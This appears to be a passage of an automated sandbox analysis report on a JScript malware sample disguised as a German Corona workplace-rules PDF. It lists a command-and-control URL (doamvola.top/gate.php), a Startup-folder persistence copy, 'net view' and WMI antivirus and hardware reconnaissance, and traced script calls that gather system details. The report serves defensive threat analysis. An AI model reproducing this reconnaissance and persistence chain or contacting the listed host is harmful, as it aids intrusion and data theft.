Source: wscript.exe, 00000000.00000003.721829932.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.738047889.000001C47F8F6000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/-8
Source: wscript.exe, 00000008.00000003.786882729.000001C47F8F6000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/-80
Source: wscript.exe, 00000000.00000003.407723822.000001A97B373000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/-8E
Source: wscript.exe, 00000000.00000003.505300801.000001A97B373000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/-8n
Source: wscript.exe, 00000000.00000003.261443979.000001A97B368000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/1
Source: wscript.exe, 00000008.00000003.591734959.000001C47F899000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/3
Source: wscript.exe, 00000000.00000003.721829932.000001A97B373000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/7
Source: wscript.exe, 00000008.00000003.738047889.000001C47F8F6000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/8
Source: wscript.exe, 00000008.00000003.786692859.000001C47F899000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/:
Source: wscript.exe, 00000008.00000003.424235011.000001C47F8F3000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/B
Source: wscript.exe, 00000000.00000002.938679802.000001A97B14A000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/Bi
Source: wscript.exe, 00000000.00000003.770598321.000001A97B373000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/J_r
Source: wscript.exe, 00000000.00000003.456424233.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.407723822.000001A97B373000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/Q
Source: wscript.exe, 00000008.00000003.424235011.000001C47F8F3000.00000004.00000001.sdmp, wscript.exe, 00000008.00000002.887480150.000001C47F8F6000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/R
Source: wscript.exe, 00000008.00000003.326005298.000001C47F899000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/T
Source: wscript.exe, 00000000.00000003.456424233.000001A97B373000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/U
Source: wscript.exe, 00000000.00000002.921061773.000001A97B094000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/W
Source: wscript.exe, 00000000.00000003.505025786.000001A97B156000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.640712158.000001C47F8F6000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/Y
Source: wscript.exe, 00000008.00000003.591940699.000001C47F8F6000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/a
Source: wscript.exe, 00000000.00000003.456424233.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.407723822.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000008.00000002.887480150.000001C47F8F6000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/e
Source: wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmp, wscript.exe, 00000008.00000002.859969111.000001C47D315000.00000004.00000040.sdmp, wscript.exe, 00000008.00000003.375512989.000001C47F92A000.00000004.00000001.sdmp, wscript.exe, 00000008.00000002.869294772.000001C47EF00000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.php
Source: wscript.exe, 00000000.00000003.576439917.000001A97B37F000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.php%
Source: wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.php1
Source: wscript.exe, 00000000.00000003.770612475.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.php1est.5)2
Source: wscript.exe, 00000000.00000003.505025786.000001A97B156000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.php2p
Source: wscript.exe, 00000000.00000003.673229698.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.php5)3
Source: wscript.exe, 00000000.00000003.820871100.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.php5)J
Source: wscript.exe, 00000000.00000003.310555901.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.php7
Source: wscript.exe, 00000000.00000003.310555901.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.php8
Source: wscript.exe, 00000000.00000002.945208756.000001A97B37F000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.673229698.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.php;
Source: wscript.exe, 00000000.00000003.770612475.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpA
Source: wscript.exe, 00000000.00000002.945208756.000001A97B37F000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.276907486.000001C47F92A000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpC
Source: wscript.exe, 00000000.00000003.624878825.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpD
Source: wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpF
Source: wscript.exe, 00000000.00000002.945208756.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpG
Source: wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpM
Source: wscript.exe, 00000000.00000003.576439917.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpN
Source: wscript.exe, 00000000.00000003.770612475.000001A97B37F000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.543239710.000001C47F8BF000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpRequest.5)
Source: wscript.exe, 00000000.00000003.721768746.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpRequest.5)S
Source: wscript.exe, 00000008.00000003.835520883.000001C47F92A000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpT
Source: wscript.exe, 00000008.00000003.835520883.000001C47F92A000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpY
Source: wscript.exe, 00000000.00000003.770612475.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpZ
Source: wscript.exe, 00000008.00000003.472743003.000001C47F92A000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.php_
Source: wscript.exe, 00000008.00000003.543353801.000001C47F92A000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpa
Source: wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpe
Source: wscript.exe, 00000000.00000003.261419753.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpem32
Source: wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpg
Source: wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpi
Source: wscript.exe, 00000000.00000002.945208756.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpk
Source: wscript.exe, 00000000.00000003.261419753.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpl
Source: wscript.exe, 00000000.00000003.310555901.000001A97B37F000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.786836988.000001C47F8C1000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phplll
Source: wscript.exe, 00000000.00000003.624878825.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpm
Source: wscript.exe, 00000000.00000003.456401710.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpm32
Source: wscript.exe, 00000008.00000003.835651628.000001C47F8C5000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpn
Source: wscript.exe, 00000008.00000003.472743003.000001C47F92A000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpp
Source: wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpq
Source: wscript.exe, 00000000.00000003.261419753.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpr
Source: wscript.exe, 00000000.00000003.407758247.000001A97B156000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpsvc
Source: wscript.exe, 00000008.00000002.882246112.000001C47F8C5000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpt.5)
Source: wscript.exe, 00000000.00000003.407731714.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpt.5)3
Source: wscript.exe, 00000000.00000003.407758247.000001A97B156000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phptive
Source: wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.424338976.000001C47F92A000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpu
Source: wscript.exe, 00000008.00000003.640853101.000001C47F8C1000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gate.phpxe887
Source: wscript.exe, 00000000.00000003.456424233.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.424235011.000001C47F8F3000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/gr
Source: wscript.exe, 00000000.00000003.407723822.000001A97B373000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/i
Source: wscript.exe, 00000008.00000003.786692859.000001C47F899000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.543151341.000001C47F899000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/m
Source: wscript.exe, 00000000.00000003.456424233.000001A97B373000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/md.exeu
Source: wscript.exe, 00000008.00000003.543302233.000001C47F8F6000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/n
Source: wscript.exe, 00000000.00000003.310549088.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.689639167.000001C47F8F6000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/ndex
Source: wscript.exe, 00000008.00000003.424235011.000001C47F8F3000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/r
Source: wscript.exe, 00000000.00000003.456424233.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.738047889.000001C47F8F6000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/son
Source: wscript.exe, 00000000.00000003.407723822.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.738047889.000001C47F8F6000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/ver
Source: wscript.exe, 00000000.00000003.310549088.000001A97B373000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/ver-
Source: wscript.exe, 00000000.00000003.310549088.000001A97B373000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/ver5
Source: wscript.exe, 00000000.00000003.310549088.000001A97B373000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/verA
Source: wscript.exe, 00000008.00000003.738047889.000001C47F8F6000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/verb
Source: wscript.exe, 00000000.00000003.407723822.000001A97B373000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/verm
Source: wscript.exe, 00000008.00000003.738047889.000001C47F8F6000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/verxe
Source: wscript.exe, 00000000.00000003.456401710.000001A97B37F000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.261419753.000001A97B37F000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.423992956.000001C47F8BF000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top:80/gate.php
Source: wscript.exe, 00000000.00000002.945208756.000001A97B37F000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top:80/gate.php0
Source: wscript.exe, 00000008.00000002.882246112.000001C47F8C5000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top:80/gate.phpp
Source: wscript.exe, 00000008.00000003.786836988.000001C47F8C1000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top:80/gate.phppE(
Source: wscript.exe, 00000000.00000002.927827180.000001A97B0D1000.00000004.00000001.sdmp, wscript.exe, 00000008.00000002.872334012.000001C47F860000.00000004.00000001.sdmp | String found in binary or memory: http://ipinfo.io/
Source: wscript.exe, 00000008.00000003.277238359.000001C47F899000.00000004.00000001.sdmp | String found in binary or memory: http://ipinfo.io/T
Source: wscript.exe, 00000008.00000003.263600682.000001C47EF18000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.259752808.000001C47EF05000.00000004.00000001.sdmp, wscript.exe, 00000008.00000002.869365398.000001C47EF58000.00000004.00000001.sdmp, Arbeitsschutzregel-Corona-September.pdf.js | String found in binary or memory: http://ipinfo.io/country
Source: wscript.exe, 00000008.00000003.263600682.000001C47EF18000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.375532736.000001C47D2A2000.00000004.00000001.sdmp, wscript.exe, 00000008.00000002.859214338.000001C47D213000.00000004.00000020.sdmp, wscript.exe, 00000008.00000002.869365398.000001C47EF58000.00000004.00000001.sdmp, Arbeitsschutzregel-Corona-September.pdf.js | String found in binary or memory: http://ipinfo.io/ip
Source: wscript.exe, 00000000.00000002.918750935.000001A97B080000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0K
Source: wscript.exe, 00000000.00000002.922769761.000001A97B0A3000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0M
Source: wscript.exe, 00000000.00000003.310586876.000001A97B140000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.835651628.000001C47F8C5000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: wscript.exe, 00000000.00000003.310586876.000001A97B140000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.640584970.000001C47F8A9000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gts1d20
Source: wscript.exe, 00000000.00000003.310586876.000001A97B140000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.640584970.000001C47F8A9000.00000004.00000001.sdmp | String found in binary or memory: http://pki.goog/gsr2/GTS1D2.crt0
Source: wscript.exe, 00000008.00000003.424338976.000001C47F92A000.00000004.00000001.sdmp | String found in binary or memory: https://displaycatalogoamvola.top/
Source: wscript.exe, 00000000.00000003.261381022.000001A97B13E000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.326005298.000001C47F899000.00000004.00000001.sdmp | String found in binary or memory: https://ipinfo.io/
Source: wscript.exe, 00000008.00000003.786692859.000001C47F899000.00000004.00000001.sdmp | String found in binary or memory: https://ipinfo.io/V
Source: wscript.exe, 00000000.00000003.310579250.000001A97B127000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.786692859.000001C47F899000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.423992956.000001C47F8BF000.00000004.00000001.sdmp | String found in binary or memory: https://ipinfo.io/country
Source: wscript.exe, 00000008.00000003.543239710.000001C47F8BF000.00000004.00000001.sdmp | String found in binary or memory: https://ipinfo.io/country6
Source: wscript.exe, 00000008.00000003.786692859.000001C47F899000.00000004.00000001.sdmp | String found in binary or memory: https://ipinfo.io/countryF6E6963
Source: wscript.exe, 00000000.00000002.927827180.000001A97B0D1000.00000004.00000001.sdmp | String found in binary or memory: https://ipinfo.io/t
Source: wscript.exe, 00000000.00000002.916942153.000001A97B06D000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000000.00000002.916942153.000001A97B06D000.00000004.00000001.sdmp, wscript.exe, 00000008.00000002.887480150.000001C47F8F6000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.comoamvola.top/
Source: wscript.exe, 00000000.00000003.310586876.000001A97B140000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.835651628.000001C47F8C5000.00000004.00000001.sdmp | String found in binary or memory: https://pki.goog/repository/0
Source: wscript.exe, 00000000.00000002.917846360.000001A97B079000.00000004.00000001.sdmp | String found in binary or memory: https://raw.githubusercontent.com/(
Source: wscript.exe, 00000000.00000002.917846360.000001A97B079000.00000004.00000001.sdmp | String found in binary or memory: https://raw.githubusercontent.com/R
Source: wscript.exe, 00000000.00000002.887458501.000001A97A6DB000.00000004.00000001.sdmp | String found in binary or memory: https://raw.githubusercontent.com/douglascrockford/JSON-js/master/jso
Source: wscript.exe, 00000008.00000003.263600682.000001C47EF18000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.259752808.000001C47EF05000.00000004.00000001.sdmp, Arbeitsschutzregel-Corona-September.pdf.js | String found in binary or memory: https://raw.githubusercontent.com/douglascrockford/JSON-js/master/json2.js
Source: wscript.exe, 00000000.00000002.859851994.000001A9788BC000.00000004.00000020.sdmp | String found in binary or memory: https://raw.githubusercontent.com/douglascrockford/JSON-js/master/json2.js&
Source: wscript.exe, 00000000.00000002.887515915.000001A97A7E5000.00000004.00000040.sdmp | String found in binary or memory: https://raw.githubusercontent.com/douglascrockford/JSON-js/master/json2.js)
Source: wscript.exe, 00000000.00000002.859851994.000001A9788BC000.00000004.00000020.sdmp | String found in binary or memory: https://raw.githubusercontent.com/douglascrockford/JSON-js/master/json2.js0
Source: wscript.exe, 00000008.00000002.859174186.000001C47D1B8000.00000004.00000020.sdmp | String found in binary or memory: https://settings-win.doamvola.top/
Source: wscript.exe, 00000000.00000002.922769761.000001A97B0A3000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443

System Summary:

Source: Arbeitsschutzregel-Corona-September.pdf.js | Initial sample: Strings found which are bigger than 50
Source: classification engine | Classification label: mal100.spre.troj.spyw.evad.winJS@12/6@8/6
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\json2[1].js
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1164:120:WilError_01
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\json2.js
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: wscript.exe, 00000000.00000003.206611156.000001A97A685000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.259752808.000001C47EF05000.00000004.00000001.sdmp | Binary or memory string: SELECT * FROM AntivirusProduct;
Source: Arbeitsschutzregel-Corona-September.pdf.js | Virustotal: Detection: 40%
Source: Arbeitsschutzregel-Corona-September.pdf.js | ReversingLabs: Detection: 24%
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Arbeitsschutzregel-Corona-September.pdf.js'
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\rad17A1B.tmp'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\net.exe net view
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.js'
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\radDC873.tmp'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\rad17A1B.tmp'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\radDC873.tmp'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: Binary string: wscript.pdbGCTL source: wscript.exe, 00000000.00000002.866841213.000001A978B80000.00000002.00000001.sdmp, wscript.exe, 00000008.00000002.859907568.000001C47D2D0000.00000002.00000001.sdmp
Source: Binary string: scrrun.pdb source: wscript.exe, 00000000.00000002.884606588.000001A97A320000.00000002.00000001.sdmp, wscript.exe, 00000008.00000002.869485807.000001C47F040000.00000002.00000001.sdmp
Source: Binary string: wshom.pdbUGP source: wscript.exe, 00000000.00000002.884578918.000001A97A2E0000.00000002.00000001.sdmp, wscript.exe, 00000008.00000002.869452646.000001C47F010000.00000002.00000001.sdmp
Source: Binary string: wscript.pdb source: wscript.exe, 00000000.00000002.866841213.000001A978B80000.00000002.00000001.sdmp, wscript.exe, 00000008.00000002.859907568.000001C47D2D0000.00000002.00000001.sdmp
Source: Binary string: wshom.pdb source: wscript.exe, 00000000.00000002.884578918.000001A97A2E0000.00000002.00000001.sdmp, wscript.exe, 00000008.00000002.869452646.000001C47F010000.00000002.00000001.sdmp
Source: Binary string: winhttpcom.pdb source: wscript.exe, 00000000.00000002.887873779.000001A97A8A0000.00000002.00000001.sdmp, wscript.exe, 00000008.00000002.869519267.000001C47F090000.00000002.00000001.sdmp
Source: Binary string: scrrun.pdbUGP source: wscript.exe, 00000000.00000002.884606588.000001A97A320000.00000002.00000001.sdmp, wscript.exe, 00000008.00000002.869485807.000001C47F040000.00000002.00000001.sdmp
Source: Binary string: winhttpcom.pdbGCTL source: wscript.exe, 00000000.00000002.887873779.000001A97A8A0000.00000002.00000001.sdmp, wscript.exe, 00000008.00000002.869519267.000001C47F090000.00000002.00000001.sdmp

Data Obfuscation:

JScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Shell");IHost.CreateObject("Microsoft.XMLHTTP");IHost.CreateObject("Scripting.FileSystemObject");IHost.CreateObject("WScript.Shell");IWshShell3.Environment("Process");IWshEnvironment.Item("temp");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\json2.js");IServerXMLHTTPRequest2.open("GET", "https://raw.githubusercontent.com/douglascrockford/JSON-js/master/jso", "true");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "XMLHTTP/1.0");IServerXMLHTTPRequest2.send("");IServerXMLHTTPRequest2.readyState();IHost.Sleep("50");IServerXMLHTTPRequest2.readyState();IHost.Sleep("50");IServerXMLHTTPRequest2.readyState();IHost.Sleep("50");IServerXMLHTTPRequest2.readyState();IHost.Sleep("50");IServerXMLHTTPRequest2.readyState();IHost.Sleep("50");IServerXMLHTTPRequest2.readyState();IHost.Sleep("50");IServerXMLHTTPRequest2.readyState();IHost.Sleep("50");IServerXMLHTTPRequest2.readyState();IServerXMLHTTPRequest2.responseText();IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\json2.js", "true");IServerXMLHTTPRequest2.responseText();ITextStream.Write("// json2.js// 2017-06-12// Public Domain.// NO WARRANTY EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.// USE YOUR OWN COPY. 
IT IS EXTREMELY UNWISE TO LOAD CODE FROM SERVERS YOU DO// NOT CONTROL.// This file creates a ");ITextStream.Close();ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_ComputerSystemProduct");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWinHttpRequest.Open("GET", "http://ipinfo.io/ip", "false");IWinHttpRequest.Send();IWinHttpRequest.WaitForResponse();IWinHttpRequest.ResponseText();IWinHttpRequest.Open("GET", "http://ipinfo.io/country", "false");IWinHttpRequest.Send();IWinHttpRequest.WaitForResponse();IWinHttpRequest.ResponseText();ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_OperatingSystem");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshNetwork2.ComputerName();IWshShell3.ExpandEnvironmentStrings("%USERNAME%");IWshNetwork2.UserDomain();IWshShell3.ExpandEnvironmentStrings("%USERNAME%");ISWbemServicesEx.ExecQuery("SELECT * FROM AntivirusProduct");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_Processor");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_VideoController");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IHost.CreateObject("Shell.Application");IShellDispatch6.GetSystemInformation("PhysicalMemoryInstalled");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();ISWbemObjectEx._01800002();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();IFileSystem3.GetSpecialFolder("2");IFileSystem3.GetTempName();IFileSystem3.BuildPath("Unsupported parameter type 00000009", "rad17A1B.tmp");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\rad17A1B.tmp");IFileSystem3.GetSpecialFolder("1");IFileSystem3.BuildPath("Unsupported parameter type 00000009", "cmd.exe");I
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Shell");IHost.CreateObject("Microsoft.XMLHTTP");IHost.CreateObject("Scripting.FileSystemObject");IHost.CreateObject("WScript.Shell");IWshShell3.Environment("Process");IWshEnvironment.Item("temp");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\json2.js");IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\json2.js", "1");ITextStream.ReadAll();ITextStream.Close();ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_ComputerSystemProduct");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWinHttpRequest.Open("GET", "http://ipinfo.io/ip", "false");IWinHttpRequest.Send();IWinHttpRequest.WaitForResponse();IWinHttpRequest.ResponseText();IWinHttpRequest.Open("GET", "http://ipinfo.io/country", "false");IWinHttpRequest.Send();IWinHttpRequest.WaitForResponse();IWinHttpRequest.ResponseText();ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_OperatingSystem");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshNetwork2.ComputerName();IWshShell3.ExpandEnvironmentStrings("%USERNAME%");IWshNetwork2.UserDomain();IWshShell3.ExpandEnvironmentStrings("%USERNAME%");ISWbemServicesEx.ExecQuery("SELECT * FROM AntivirusProduct");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_Processor");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_VideoController");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IHost.CreateObject("Shell.Application");IShellDispatch6.GetSystemInformation("PhysicalMemoryInstalled");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();ISWbemObjectEx._01800002();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();IFileSystem3.GetSpecialFolder("2");IFileSystem3.GetTempName();IFileSystem3.BuildPath("Unsupported parameter type 00000009", 
